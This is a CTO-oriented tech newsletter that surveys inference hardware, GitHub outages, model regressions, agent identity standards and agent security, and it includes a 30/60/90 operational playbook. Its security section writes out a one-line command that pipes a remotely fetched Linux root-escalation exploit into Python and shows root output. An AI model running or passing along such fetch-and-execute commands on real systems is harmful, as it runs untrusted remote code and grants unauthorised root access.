CTO Lunch NYC🪻Spring 2026
Tech Roundup for CTOs, CAIOs and CDAOs
While NYC CTOs were sitting down for lunch together at a 117 year old bar in Manhattan, Nvidia GTC (GPU Technology Conference) in San Jose—where the nearest CTO Lunch chapter is Norcal, which meets in SF—was wrapping up after an astounding 621 sessions across 3 languages, and Jensen Huang had just done his Vera Rubin victory lap in his trademark leather jacket (the kind you used to see everywhere in NYC and now only see on stages) for hardware that won't ship until Q4 at best, meaning 2027 if you're not AWS or Microsoft. And thirty thousand people gave him a standing ovation for a product announcement. (Well a lot of them did.)
If you were lucky enough to have been in both places (honestly it's only luck if you score a whole row on the redeye back in time for lunch) you'd notice the same conversation taking place in both venues; namely, the realization that the stack is destabilizing at every layer simultaneously, CTOs saying that most organizations are still acting as if that’s purely a procurement problem rather than an operational one.
You’re flying 2,500 miles to make it to a lunch where people are complaining about the exact same things you just heard in Silicon Valley.
Nearly coinciding with our last lunch, and 40 blocks away, a Vercel employee connected a third-party agent app to their corporate Google account and discovered (the hard way) exactly how much of enterprise security was built around the assumption that the person on the other end of the credential was a person.
From Jensen’s victory lap for an architecture that isn’t shipping yet to the Google Cloud Next keynote quietly declaring that the entire modern data stack was built for the wrong user; from Github’s growing fascination with service degradation to Anthropic’s moving all the furniture around when no one’s looking, to OpenAI’s product line changes and departures, to the surprising (or not so surprising) blast radius of a single Vercel employee connecting a single OAuth app to their corporate Google account; sideways seemed to be the preferred direction this quarter. (Well, not the S&P 500 and NASDAQ Composite, obvi.)
But none of these are unrelated incidents. They’re all dispatches from the same saga, and they share the same structural underpinnings. The emerging (agentic) stack is destabilizing and being destabilized at every layer simultaneously; infrastructure, models, governance, tooling, and the shared world models that hold all of it together.
IN THIS ISSUE
It’s Her (token) Factory
We Need to Talk about Github
Moving the Furniture in Real Time
The Enterprise Agentic Stack Arrives
Context is King (for a day)
RSC-y Business
Colapso
It’s Her (token) Factory
Last year we mapped the five-tier value chain of AI and noted that only Tier 1 was making real money. Each tier theoretically capturing margin by adding differentiation, one tier actually doing it, the rest playing hot potato as the model showed signs of becoming featurized while the infrastructure around it was becoming the business. But all that’s last year already; you were just apprised in advance.
Just 2 days before aforementioned lunch, Jensen Huang stood on that stage in San Jose to kick off those astonishing 621 sessions (tbc: it was the number that was astonishing; a number of sessions were not necessarily so) and took his victory lap for Vera Rubin, which is not shipping yet.
What actually shipped was Magic Attention and Warp Specialized Attention. In essence, both are variants on the barnyard bromide “all tokens are equal but some are more equal that others.” Magic Attention routes compute dynamically based on token relevance, the silicon now sorting signal from noise at inference time rather than brute-forcing the whole context window. Warp Specialized Attention goes lower still, down to the 32-thread atomic unit of GPU execution, parallelizing the attention kernel itself (query, key, value, output all running concurrently) to not just push back, but structurally eliminate the memory tax bottleneck every serious inference workload has to pay (the bandwidth bottleneck between GPU compute and GPU memory.)
If the room understood what that meant, Jensen wouldn’t have needed the leather jacket. (There’s a reason NYC CTOs don’t really wear those anymore.)
What it means is this: the data center used to be a warehouse. You bought capacity, held it, served against it. Overprovision, autoscale, cache aggressively, pray your worst-case concurrency assumptions held. It’s how we’ve always done it. Inference breaks that abstraction at the foundation. Tokens enter as raw material. Inside the system they are culled, recombined, and amplified with highly uneven expenditure of compute. Most of the input is not preserved but consumed in the act of producing the output. The transformation is the product. What matters is not how much state you can hold but how efficiently you can drive that transformation under hard constraints: latency, bandwidth, power, cost, SLOs. Which is a factory dynamic, not a warehouse.
The data center used to be a place for files. It’s now a factory for tokens.
Historically, capacity planning assumed a relatively stable relationship between input and compute. That relationship is gone. Inference workloads are nonlinear, context-sensitive, and shaped by attention mechanisms your procurement team has never heard of and probably won’t understand. And the organizations still treating this as a warehouse problem, or procurement, still capacity planning, still autoscaling against static assumptions, are running factory economics through warehouse math.
Because the value has shifted (accordingly): not to whoever owns the largest static artifact, but to whoever runs the most efficient transformation pipeline across hardware, runtime and orchestration.
We Need to Talk about Github
To run efficient pipelines, though, you need stable infrastructure, but what exactly is going on over at GitHub these days? Just since our last newsletter they have averaged an incident per day, no cap. And if you showed me the shambolic status bars for Anthropic and GitHub side-by-side, I’d be hard pressed to even say which was which, tbh, with a number of Github incidents being high severity and in at least one case a CVSS 8.7 remote code execution.
It got so bad Mitchell Hashimoto started keeping a journal (Mitchell is GitHub user #1288, signed up in 2008; the year of my very first talk on Git + Mongo, FWIW.) He’s been logging incidents for months and the data is—as we say—brutal: 37 incidents in February; 28 in March; 23 in April. One Merge Queue bug silently reverted commits across 658 repositories and 2,092 PRs. April 28 brought CVE-2026-3854, CVSS 8.7, remote code execution in the internal git layer, with 88% of GitHub Enterprise Server instances still unpatched at last count. If you’ve been wondering whether the degradation you’ve been noticing is serious or exaggerated, he brought the receipts.
Zig migrated to Codeberg in December, which registered as a warning shot at the time and got filed away as one project’s idiosyncratic preference. I mean, it’s Zig, right? But Mitchell announcing Ghostty was following suit was the dam bursting.
The Copilot revenue story is genuinely good. The platform reliability story isn’t, and the two are arguably not coincidental.
But Microsoft is pouring its engineering attention into Copilot features while the underlying platform accrues the kind of (quiet) degradation that’s inappropriate for a product announcement and rarely makes it into any documentation surface at all. This concern has a particular weight right now because IaC has become the mandatory backbone for scaling AI systems and multi-cloud architectures, and the transition already underway is pushing it further toward autonomous, self-healing environments where policy and intent drive the architecture rather than static, human-written configuration.
Terraform (or Tofu, post-IBM acquisition) plans that a human reviews before applying are giving way to systems that continuously reconcile desired state with actual state. Less like an OODA loop and more like homeostasis. The more autonomy you push into the infrastructure layer, the more the platform running your pipelines, your repos, your CI/CD has to be something you can actually depend on.
GitHub degrading precisely as IaC matures toward autonomy is “no coincidence” but is a compounding problem with a compounding cost: the more your infrastructure drives itself, the more catastrophically it fails when the platform underneath it doesn't.
Moving the Furniture in Real Time
The Gartner Hype Cycle has always been a useful fiction, but it used to at least hold still. It now feels less like a cycle and more like someone rearranging the furniture while you’re sitting on it. In the dark. While billing you for the privilege. CTOs aren’t the only ones tripping over it, but they’re the ones expected to explain the bruises at the next board meeting. Doubly so, if you’re fractional. At lunch, the conversation keeps circling back to the same uncomfortable realization: the capability you validated in Q1 is not the capability you’re running in Q2. And Q3 is days away.
Although Opus 4.6 (released Q1) didn’t draw the extremely vocal dissatisfaction for coding as it was met with in the writers community, it actually regressed on SWE-Bench. When Opus 4.7 arrived (same vendor, same product line, one release cycle) and drew the kind of vocal, sustained dissatisfaction that’s genuinely hard to achieve in a market that can’t stop praising everything (worse than GPT-5 launch, impressive in the wrong direction!) it broke the foundational assumption most shops had bought into: that newer means better. Nope. Not predictably. Not reliably. Not structurally. Treating this as a fluke rather than a pattern is the more expensive mistake, btw.
The loyalty churn compounds this. One month Claude Code is your team’s golden goose. The next it’s nerfed and Codex is back. Tool loyalty in this space has more back-and-forth than the US Open final. And then there’s that one guy on the team who insists Gemini CLI is best, but never seems to be able to articulate why beyond personal preference. (The worst part is he might be right by the time this goes to print.) You thought you were standardizing on a tool; you were renting one mid-identity crisis.
None of this has a name yet, which ofc is part of the problem. Model (and harness) instability as an infrastructure risk class is real, consequential, and eating engineering hours across the industry, but it doesn’t have the vocabulary that would force it onto a risk register. It needs a line item in the workbook.
Your ersatz leading indicator is the quality of your engineers’ Slack complaints. (Because that’s obviously a lagging indicator.) More specifically: the proliferation of workarounds, the tool-switching that doesn’t go through approval, the browser extension shipped to another team to automate clicking “continue.” (We won’t talk about the Javascript that got passed around to automate watching mandatory HR trainings.) When your team is scripting around vendor rate limits at that speed, you’re not reading a leading indicator, you’re already en route to a post-mortem.
The Stack Beneath the Model Is Also Moving
Stability is not a feature. It’s a tax you pay somewhere.
It’s not just model mayhem. Although models are not as predictable as they once were (if you’ll forgive me the expression.) The jump in token usage from 4.5 to 4.6 was noticeable but then Opus 4.7 arrived with a near-quadrupling of token usage on identical prompts. This showed an industry rule of thumb, that you could estimate cost from prompt structure, even as prompts were growing in cost, wasn’t nearly as reliable as was previously thought. And it wasn’t thought to be so reliable to begin with. We’re back to guessing at quality, latency, and cost simultaneously.
Everything underneath is moving at the same time, and the regression surface is larger than most teams have mapped. At the SaaS product layer (Claude Code; Codex; Gemini CLI, I guess) you get model plus harness plus UX, bundled, with no meaningful changelog. You are effectively QA for a product you don’t control. Unpinned APIs offer maximum volatility with minimum warning; you’re opting into drift whether you know it or not. Pinned APIs give you fixed weights, but the surroundings (system prompts, safety filters, retrievers) are still fluctuating on vibes. Self-hosted open weights hand you the regression surface you always wanted: yours, entirely, to debug at 2am. (Congratulations. Hope you like kernels.) None of these options are clean; all of them are hiding costs somewhere.
Anthropic shipped approximately 50 updates in 52 days (impressive velocity or an admission of instability, depending on your blood pressure). Tool call limits dropped silently from roughly 80 per turn to somewhere between 10 and 20. Peak-hour throttling became normalized across all tiers, with dedicated sites now cataloging the outages. OpenAI’s version is more theatrical: A Sora announcement with considerable fanfare was followed by the entire project being killed the next day, the team blindsided, Disney finding out about the billion-dollar partnership cancellation with under an hour’s notice. The head of OpenAI for Science likewise making a huge product announcement the day before he drops his suspiciously effusive severance-compliant farewell. Three of their top execs announcing their unplanned departures late on a Friday with extremely polite goodbye posts doing a lot of legal work. The through-line is the same in both cases: if their own teams don’t have a stable roadmap, your own roadmap which includes them as a dependency is hitched to a runaway process.
Then there’s the irony nobody at lunch can quite stop laughing at. Dario Amodei is publicly arguing we no longer need programmers and we won’t need software engineers much longer. Meanwhile Anthropic can’t hold two nines of uptime. Maybe they don’t need software engineering; CTOs still do.
The honest answer on what to do fits in two points. Internal evals are the only signal you actually own: continuous, workload-specific, and running before you need them, not after. Open weights are the architectural escape hatch; real stability and real control in exchange for real infrastructure responsibility, and not as expensive as they used to be relative to what proprietary instability is now costing. And the calculus is moving fast enough that neither option is dismissible; both paths are unstable in different ways, both are improving rapidly, and choosing without acknowledging this is how you write the next case study. Or maybe yours will be a success story. (If you implement the recommended playbook, following.)
CTO Playbook: 30/60/90
Model Version Pinning Audit (HIGH PRIORITY - 30 days):
Enumerate all production LLM calls across services (grep codebase, inspect API gateways, trace outbound requests). Extract: provider, model name, version/snapshot, invocation path. Identify any calls without explicit snapshot pinning and any references to deprecated snapshots (e.g.,
20250514). Replay a fixed prompt set (≥50 representative prompts) against current vs latest model versions to measure token count variance and output drift.Measure: % unpinned calls, deprecated snapshot usage count, token delta distribution (p50/p95), output diff rate.
Deliverables: versioned model inventory (service → endpoint → model → snapshot), deprecation remediation list with owners, token cost variance report on fixed prompts, CI/CD rules to reject unpinned snapshots (backlog).
OAuth Access Audit (HIGH PRIORITY - 30 days):
Query all OAuth integrations via admin APIs (Google Workspace, GitHub, Slack). For each app: pull scopes, install date, last access timestamp, associated users/services. Cross-reference with IAM to identify service accounts vs human users. Validate scope necessity against actual API usage logs. Revoke tokens for unused apps (>30 days inactivity) and any app without mapped owner.
Measure: total OAuth apps, % with unused scopes, % without owner, number of high-risk scopes (write/admin).
Deliverables: OAuth registry table (app_id → scopes → owner → last_used → risk_score), revocation log, list of over-scoped apps with required scope reductions, access review sign-off.
GitHub Dependency Mapping (HIGH PRIORITY - 30 days):
Extract all GitHub-dependent workflows (Actions YAML, webhooks, Packages pulls, Pages deployments). Build dependency graph: service → workflow → GitHub feature. Chaos day: Simulate failure by disabling Actions in staging or blocking api.github.com egress. Record pipeline failures, deployment blocks, artifact fetch errors.
Measure: number of critical workflows dependent on Actions, mean time to failure under outage simulation, % of pipelines without fallback.
Deliverables: dependency graph (DAG format), outage impact matrix (workflow → failure mode → severity), list of single points of failure, remediation backlog (mirror, cache, or decouple).
Continuous Evaluation System: (MEDIUM PRIORITY — 60 days):
Reference implementation: Continuous Evaluation with Harbor
Implement continuous evals for Prod LLM and agent workflows using Harbor as execution layer. Goal: run ongoing, reproducible evaluations on real production traces to detect model drift, agent degradation, and tool-use failures. Sampling, dataset construction, evaluation execution, and CI-triggered runs should follow the Harbor continuous eval workflow.
Measure: pass/fail rate per workflow, semantic drift vs baseline, output variance %, agent tool-use success rate.
Deliverables: Harbor-based continuous evaluation system, versioned production trace datasets per workflow, CI-triggered evaluation runs, regression dashboard across model and agent performance, rollback thresholds tied to observed regression.
Repository Failover (MEDIUM PRIORITY - 60 days):
Set up secondary Git host. Mirror repositories using scheduled sync. Replicate access controls and deploy keys. Reconfigure CI pipelines to support alternate git remote. Execute controlled failover: switch origin, trigger build, validate artifact production and deployment.
Measure: sync lag (seconds), failover time (minutes), % pipelines passing post-failover.
Deliverables: mirrored repos with sync automation, documented failover runbook, successful failover test logs, rollback procedure.
Pipeline Monitoring Decoupling (MEDIUM PRIORITY - 60 days):
Implement external monitoring (e.g., cron-based or event-driven) to poll pipeline endpoints and artifact availability independent of GitHub. Inject synthetic transactions (trigger builds, verify completion via API). Route alerts through independent channel (PagerDuty, etc.). Simulate GitHub outage by blocking API access and confirm alert triggers.
Measure: alert latency under failure, % pipelines with coverage, false negative rate in simulation.
Deliverables: monitoring service w coverage map (pipeline → monitor), alerting config, outage simulation report with detected vs missed failures.
Model API Stability Policy (QUARTERLY OKR - 90 days):
Define enforcement rules: all model calls must include explicit snapshot/version; fallback chains must be explicit and logged. Implement static analysis (lint rule or CI check) to reject unpinned model usage. Add runtime logging for model selection, fallback invocation, and version drift. Schedule review cadence aligned to vendor release cycles.
Measure: % compliance with pinning policy, number of fallback events per week, time-to-detect version drift.
Deliverables: policy document, linting/CI enforcement rules, logging schema for model usage, weekly drift report.
GitOps Host Abstraction Assessment (QUARTERLY OKR - 90 days):
Audit deployment system (Flux/ArgoCD/etc.) for hardcoded GitHub dependencies (URLs, auth, webhook triggers). Test multi-source configuration with secondary Git host. Attempt full environment sync from non-GitHub source. Identify blockers (auth, tooling assumptions, pipeline coupling).
Measure: % of workloads deployable from alternate host, number of GitHub-specific dependencies, time to switch source.
Deliverable: architecture assessment (component → dependency), list of GitHub-coupled elements, implementation plan to achieve host abstraction.
Open Weights Evaluation (QUARTERLY OKR - 90 days):
Select candidate open-weight models. Deploy locally or in VPC. Run same eval dataset as API models. Measure inference latency (cold/warm), throughput (req/s), infra cost (GPU hours), and output quality vs baseline. Test operational constraints: scaling, failure recovery, model reload times.
Measure: cost per 1K requests, latency p50/p95, output quality delta vs API baseline, ops overhead (engineer hours/week).
Deliverable: benchmark report (API vs open-weight), infra cost model, performance comparison charts, recommendation on scope of adoption.
Enterprise Agentic Stack Arrives (which one?)
“We’re no longer thinking about human personas like data scientists.
We’re thinking about agents as the persona.”
We’ve talked before about the collapse of the modern data stack. It’s now collapsing from an entirely new pressure, or rather the same source previously identified, now felt at production scale. The entire modern data stack, dbt, Fivetran, the warehouse underneath it, the BI layer on top, was architected around human-paced consumption, the assumption that the user is a human that’s baked into every abstraction layer in the stack. While it may seem obvious that, if agents are the user class now, that’s a lot of infrastructure built for the wrong person, why did it take someone saying this from a big enough stage—last week at Google Cloud Next in Las Vegas—for enterprise architects to respond? That’s a rhetorical question, obvi.
Gemini Enterprise Agent Platform (GEAP‽) is Google’s theory of where the response goes: Agent Studio, Agent-to-Agent Orchestration, Agent Registry, Agent Identity, Agent Gateway, Agent Observability. Agent Identity. Their naming as fun and un-subtle as ever. But notice what’s sitting inside that stack: Agent-to-Agent Orchestration isn’t a proprietary Google feature. It’s built on A2A, the Agent-to-Agent Protocol that Google originated and then donated to the Linux Foundation, which just hit its one-year mark with over 150 supporting organizations (incl. AWS, Microsoft, Cisco, IBM, Salesforce, SAP, and ServiceNow) with production deployments across supply chain, financial services, insurance, and IT operations. Microsoft has embedded it in Azure AI Foundry and Copilot Studio. AWS shipped support through Bedrock AgentCore Runtime. This isn’t a Google platform. This is a standards moment, and it happened while everyone was watching the cloud keynotes.
A2A/MCP pairing is a sharper way to see the stack taking shape. A2A defines how agents communicate and coordinate across organizational boundaries. MCP, also now a Linux Foundation project, defines how agents connect to internal tools and data sources. Together they form a two-layer foundation for multi-agent systems that don't require a single-vendor approach. The interoperability problem, the one that was going to generate years of proprietary lock-in fights, has a potential answer.
Google's bet, on top of that foundation, is that governance has to be enforced before an agent touches anything, at the control plane, below the application layer, the same way IAM is enforced before a human touches anything, with observability and policy baked in. By the time an agent is inside your application boundary, in this theory, the governance window has already closed. Their 8th gen TPU inference pod (1,152 TPUs, 3x on-chip SRAM, built to run millions of agents concurrently) is the hardware for the world this theory requires.
The same week Google announced Agent Identity as a foundational infrastructure primitive, Vercel shipped Next.js 16.2 and called it “agent-native.”
Vercel’s theory is that the application layer is where agent intelligence should live, embedded in runtime context, version-matched documentation, and direct application observability, rather than governed from infrastructure below. The agent doesn’t need an identity primitive if it never leaves the application boundary.
Next.js 16.2 ships AGENTS.md into every new project: a file that redirects agents from stale training data to version-matched documentation bundled directly in node_modules. Vercel ran the evals. AGENTS.md hit 100% on Next.js tasks. Skills-based approaches maxed out at 79%, because skills require the agent to recognize when to invoke them, and in 56% of eval cases it didn’t. Always-available context beats on-demand retrieval, which is a finding with implications well beyond Next.js. next-browser goes further: terminal access to a running application, screenshots, network requests, console logs, React component trees, all returned as structured text an agent can reason about without touching a browser UI. The agent sees what the application is doing in real time.
Which one of these visions is right about where agents actually live and who governs them? Vercel is building from the application layer down: AGENTS.md plus bundled docs that make your agent an expert in the exact version of Next.js it’s running, a purpose-built browser tool for frontend debugging and optimization, a framework that treats the agent as a first-class runtime citizen. (Mitchell Hashimoto, fresh from keeping GitHub’s incident journal, just joined the Vercel board. The open source infrastructure world is quietly reorganizing around a specific architectural thesis, and that’s where he placed his marker.)
Google's answer to that question is that the application layer is too late. Agent Identity in the Gemini stack isn't a feature you bolt on after deployment, it's a primitive, enforced at the control plane before an agent is permitted to act; the same way IAM governs humans before they touch anything. Agents in this model are credentialed, scoped, and auditable from the infrastructure layer up. The six-product announcement (Studio, Orchestration, Registry, Identity, Gateway, Observability) is not a product suite. It's a governance stack, and the sequence is deliberate: you don't get to Orchestration without Identity, you don't get to Observability without Gateway.
Google is arguing that the blast radius of an ungoverned agent isn't an application problem. It's an infrastructure problem, and infrastructure problems require infrastructure solutions. A2A v1.0 ships Signed Agent Cards, cryptographic identity verification baked into the protocol itself, which is as explicit as a spec gets about where the project thinks identity has to live.
Then the Context AI incident happened, and the debate got a lot more concrete.
A Vercel employee downloaded a third-party agent app, connected it to their corporate Google account via OAuth, and the chain unraveled. Account takeover. Internal system access. Unencrypted credentials exposed. Context AI, for its part, did its best to treat this as a footnote.
The only irony is structural. Agent Identity, the piece Google announced as a foundational infrastructure primitive and the piece the broader A2A ecosystem just shipped a cryptographic answer for, is the hardest unsolved deployment problem in the agentic stack, and here is exactly what it looks like when it fails in the wild. At the company that shipped AGENTS.md. Against a protocol that had the answer in the spec. It just didn’t make it into the deployment.
Google is probably right that Agent Identity needs to be solved at the infrastructure layer. The industry just ratified Google's bet in the form of an open standard. Vercel just ran the proof of concept for why it matters. The question for every CTO in the room is which failure mode you're currently exposed to, and whether you've priced it. That's the work Agentic Reliability Engineering (ARE), if we're naming the discipline, actually does.
Context is King (for a day)
Context Engineering isn’t a discipline. It’s a symptom.
We used to treat context as something systems carried. That day is gone. The interesting question is why context is king, and the answer is less flattering than the royal sloganeering implies. Context is king because it forgets. Every agent session starts from nothing, no memory of last Tuesday's decision, no awareness of the exception carved out in February, no institutional knowledge of any kind. The context window is finite, ephemeral, and when the session ends, the kingdom falls. You rebuild it tomorrow. Context is king for a day because that's all the reign it gets.
The reason this is even possible to say out loud, the reason context and meaning are so tightly coupled that losing one destroys the other, traces back to Zelig Harris and the distributional hypothesis: meaning is literally a function of context, not a property of tokens. That's the insight that made all of modern NLP possible, and it's also the source of the problem. If meaning is context-dependent all the way down, then systems that drop their context don't just forget. They become incoherent.
This is what's underneath the term "context engineering" that's been circulating lately. It's not a discipline. It's a symptom. It's what software architecture looks like when the model is the runtime, amnesia is a default system behavior, and the response is to hire someone to manage the forgetting more carefully. Every layer of abstraction eventually collapses under the weight of implicit state. We've been here before. We just called it state management, and we had better tooling for it.
If you liked configuration drift, you're gonna love context drift.
Context drift is the actual enemy, and none of the current standard-issue responses actually fight it. Prompt engineering is muscle memory for a problem that has moved on. RAG pipelines are transitional fossils — useful, not sufficient. Carefully curated embeddings are a partial answer to a question that keeps getting bigger. None of them solve the core problem: every tool call, every intermediate step, every partial output introduces entropy into the system's understanding of what's going on. The more agents you add, the less predictable the system becomes — not because the models are worse, but because the shared world model is dissolving.
Neo4j Labs shipped uvx create-context-graph earlier this year, and Context Hub (chub) is the delivery vehicle that lets agents build and query a local context graph: persistent, local-first, queryable. The mechanical description is accurate and misses the point entirely. What chub is actually doing is operationalizing something the industry has been hand-waving for months: context isn't a prompt, it's a topology. Agents aren’t the recipients of context; they traverse it, mutate it, and occasionally corrupt it. CLI scaffolding is support for the moment the pattern morphs from whitepaper to make install. (We moved from CRA to Vite, and then from Vite to turbopack. It keeps getting faster.) What React did for front-end state, this is trying to do for agent cognition, but without the luxury of pretending the state is local, ephemeral, or internally consistent.
The next generation of systems won't be defined by how they process tokens,
but by how they stabilize context across time.
This is the shift from stateless intelligence to stateful coherence, and it represents an architectural inversion that hasn't fully landed yet. The old model: models at the core, data as input, context as wrapper. Call it MDC. The emerging model inverts it: context as core, data as one of many context sources, models as interchangeable operators. (CDM) The model isn't the thing anymore. The context layer is. At the upper echelons of enterprise, where the word travels more slowly, the realization is arriving that competitive advantage isn't about having the best fine-tuned model. It's about building, maintaining, and querying a high-fidelity context layer. Which, if you're keeping score, is basically a speedrun of the "it's the data, not the models" revelation from the MLOps era. History doesn't repeat, but it does maintain a context graph.
The master/emissary phenomenon we've talked about before applies here with particular force: capability has scaled faster than coherence, which means you have ambiguity operating at two distinct levels simultaneously; in the latent space of the models and in the shared world model dissolving across agents. Are you starting to see why there's a billion dollars pointing at the world model problem? Are you starting to get the sense of just how fast that train is moving, based purely on the singular convergence of attention across the top tech corridors — everyone talking about the same thing without quite knowing it, united in opposition to system entropy? Context graphs are the first serious attempt to fight that entropy at the architectural level. Not a passing of the crown. 👑 A regime change from within.
❝ Take away the context and the meaning also disappears. When you perceive intelligently… you always perceive a function, never an object in the set-theoretic or physical sense. ❞
— Stanislaw Ulam, quoted by Gian-Carlo Rota in ‘Indiscreet Thoughts’
RSC-y Business
The security perimeter was always a fiction maintained by the friction of human operations.
Let’s talk about copy fail. [https://copy.fail/#exploit] Or, actually, let’s just run it:
% curl https://copy.fail/exp | python3 && su
% id
uid=0(root) gid=1002(user) groups=1002(user)This works on every Linux distro since 2017. It’s 732 bytes. No race window. No kernel offset. One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write. And an unprivileged local account and one Python script.
Discovered by an AI in about an hour of scan time using one operator prompt an no harness. And it found a non-exotic root privilege escalation exploit sitting here unnoticed for 9 years. TBC, this wasn’t an exotic attack, let alone a nation-state, no zero-day. It was one prompt and an hour of scanning.
The Context AI incident wasn’t exotic either. It was one employee with one third-party agent app over one OAuth connection to a corporate Google account. Boom. Corporate account compromised, internal systems accessed, unencrypted credentials exposed. No sophisticated attack chain. No zero-day. Again, no nation-state threat actor. Just the entirely predictable consequence of OAuth as an identity model for agents that act autonomously on behalf of humans inside enterprise systems. The blast radius of a single misconfigured trust relationship, in a world where agents are now operational.
The security community has been watching this coming. Last December OWASP published the Top 10 for Agentic Applications, the first formal taxonomy of risks specific to autonomous AI agents, covering goal hijacking, tool misuse, identity abuse, memory poisoning, cascading failures, and rogue agents. Real categories, based on real incidents. Hidden prompts turning copilots into silent exfiltration engines. Agents bending legitimate tools into destructive outputs. Leaked credentials letting them operate far beyond their intended scope.
Institutional responses followed. Microsoft shipped the Agent Governance Toolkit in April, open-source, MIT-licensed, the first toolkit to address all 10 OWASP agentic AI risks with deterministic, sub-millisecond policy enforcement. The Colorado AI Act becomes enforceable in June 2026. Over in the EU, AI Act’s high-risk AI obligations take effect in August. The enterprise security stack is reorganizing around the agentic threat model in real time, with enough urgency that the regulatory and tooling responses are arriving within weeks of each other. Palo Alto announced the acquisition of Portkey yesterday, positioning their AI Gateway as the unified control plane for agent traffic governance.
And yet. Only 21% of organizations have a mature governance model for autonomous AI agents. Nearly as many organizations expect their AI agent security investment to decrease over the next twelve months as expect it to increase (41.6% versus 42.4%) at the exact moment agents are moving from pilots to production, from read to write access, from controlled experiments to autonomous operations across enterprise systems that were never designed for this. The investment curve and the risk curve are running in opposite directions. I honestly can’t explain it. Ok, maybe I can.
The question is why, and the answer, if you’ve been paying attention this newsletter, is the same answer it always is: the threat model isn’t visible yet because the world model that would make it visible doesn’t exist. Organizations can’t price a risk they haven’t encoded; can’t govern behavior they haven’t modeled; can’t defend a boundary they assumed rather than enforced. So many things they can’t do.
There is also the harder version of this problem. Anthropic’s Mythos Preview was a gated research preview for defensive cybersecurity work. What the system card notes, carefully, is that Anthropic did not explicitly train Mythos to have offensive capabilities. They emerged as a downstream consequence of general improvements in code, reasoning, and autonomy. The same improvements that make the model more effective at patching vulnerabilities also make it more effective at exploiting them. Which also means it’s nothing particular to Mythos. GPT 5.5 is finding this same class of exploits. In theory Qwen isn’t that far behind discovering root escalations in a decade’s worth of Linux releases in about an hour of scan time. The capability surface and the threat surface are now the same surface, and they’re expanding together. CTOs want to know what what’s collapsing under the weigh of this expanding surface.
Calypso Colapso
Signs of collapse are everywhere. For CTOs, the trick is knowing what it’s collapsing into. And why.
If you’ve been paying attention you may have noticed each layer of the stack has destabilized for the same reason. Not because the vendors are incompetent, though some of them are having a rough quarter. Not because the industry is moving fast, though it is (still not as fast as some would like.) But underneath it all, the same structural failure expressing itself at every layer simultaneously: the shared world model was never in the substrate. It was in people’s heads, in institutional memory, in the implicit understanding of what “canonical state” means and when to tombstone versus hard delete. Under agentic pressure, this missing map is multiplying malfunction across the entire ecosystem.
At the bottom of the stack it’s why data centers can no longer be treated as a warehouse, which was always just a buffer on ultimate throughput. Tokens factories make this explicit, specifically the need for efficient transformation pipeline across hardware, runtime and orchestration that either has a shared model or a way to withstand collapse in the absence of one.
But the infrastructure layer we rely on for that stability is also collapsing. Github literally just had 88 incidents in 89 days. Anthropic's status bar looks like a Gerhard Richter. And the real horror is that infra is learning to drive itself on a substrate that is silently, consistently, undependably wrong. That’s a new category of failure that doesn’t have a runbook yet.
Above that, model performance is also destabilized. Regressive updates, to be concise. But with the regression surface expanded to include things you didn’t know you were depending on; tokenizer behavior, tool call limits, system prompt interpretation. Your vendors’ release cadence became an infrastructure risk class with no line on your risk register.
All of which leads us to the agentic stack explicitly, which ofc has arrived before anyone agreed on where agents live or who governs them. The human persona, which was never a security boundary so much as an assumption we occasionally noticed, got stress-tested and was found wanting, as were security protocols at the company making the most interesting argument for application-layer agent governance. (And context concerns sitting atop of all this, quietly munching tokens like a snack attack.)
Every layer of the stack was architected for a world that assumed stability; stable hardware economics, stable infrastructure primitives, stable model behavior, stable human personas as the unit of identity, stable institutional knowledge as the carrier of architectural intent. That world is gone. What replaced it is a system under continuous destabilization, in multiple directions, faster than most organizational response times, and the standard responses (better procurement, more vendors, tighter SLAs) are solutions to a problem that assumed a shared world model as fixed point of reference.
You now have some insight why Yann LeCun is so hopped up about world models. Not the Yann of the quote-tweet, nor the Yann of the panel debate, nor the Yann of the long-running public disagreement with people who think scaling is all you need. The actual argument, which has been consistent and specific and largely misread as contrarianism: that a system without a persistent, structured model of the world it's operating in is not intelligent, it's interpolating. That the difference between a system that can act coherently across contexts and one that can't is not a bigger context window or a better attention mechanism, it's whether the system has internalized a model of how the world works that persists across interactions, updates with new information, and can be queried, corrected, and composed with other world models.
Which is AGI, no? Not the AGI of a philosophic treatise, or podcasts or CEO tweets or news media or influencers or that one person you see at literally every single event in SF or the long tail of flame wars on social media. But AGI as the global solution, the intelligence layer built in response to the problem of shared world model reconciliation across domain and service boundaries, across the layers of the collapsing stack. The problem we have just watched express itself over the last quarter.
What we really saw this quarter, in the hardware annoucements, the GitHub incidents, the model instability, the agentic identity crisis, and the context drift, across five different layers and five different sets of vendors and failure modes and engineering teams having very different bad weeks (and so missing lunch) at the bottom of every single one, the same load-bearing absence: a shared world model that was never in the substrate.
The same root cause surfacing independently across hardware economics, infrastructure trust, model behavioral stability, agent identity, and context coherence.
Here's what that looks like when you trace it through each layer specifically. GitHub's Merge Queue bug didn't silently revert commits across 658 repositories because the engineers were careless. It did so because the system had grown complex enough that no team held a coherent model of its own state what "canonical" meant, what a commit's downstream effects were, which invariants still held. That's a world model failure expressed as infrastructure. The Opus 4.7 regression is the same failure expressed as a model release: the vendor's internal model of "what improvement means" diverged from the production model of "what better means in your workload," with no shared ground truth to arbitrate between them. The Context AI incident is the same failure expressed as identity: OAuth was designed for a world where the entity holding credentials was a human with persistent, accountable behavior. The second an agent held those credentials, the identity system was running on a world model that no longer described reality. And context drift is just this failure made explicit as agents begin every session with no world model at all, reconstruct it imperfectly from available context, and in multi-agent systems, each agent's partial reconstruction diverges from every other agent's, producing a shared world model that is dissolving in real time.
The world model problem isn’t one of many things that needs solving. It’s the thing. And it’s about to get dramatically more visible as agentic systems move from pilots to production, from read access to write access, from controlled experiments to autonomous operations across enterprise systems that were never designed for this.
That billion dollars isn't a bet on a researcher. Legendary he may be. It's a bet that the problem we’ve been analyzing is real, structural, and large enough to be worth solving from first principles. He wasn’t given a billion dollars for the discourse. He was given it for the diagnosis. To build the structural remedy for collapse.
And that is the actual state of the stack: not broken, not evolving, but actively de-cohering along every axis once assumed to be stable. Hardware economics, infrastructure trust, model behavior, agent identity, context continuity: all moving at once, all failing in correlated ways no single vendor owns end-to-end.
The only remaining variable is whether you treat that as a procurement cycle or an architectural constraint.
—Forest Mars for CTO Lunch NYC
To attend CTO Lunch, sign up at ctolunches.com and rsvp (‘will’ attend, not ‘want to’)



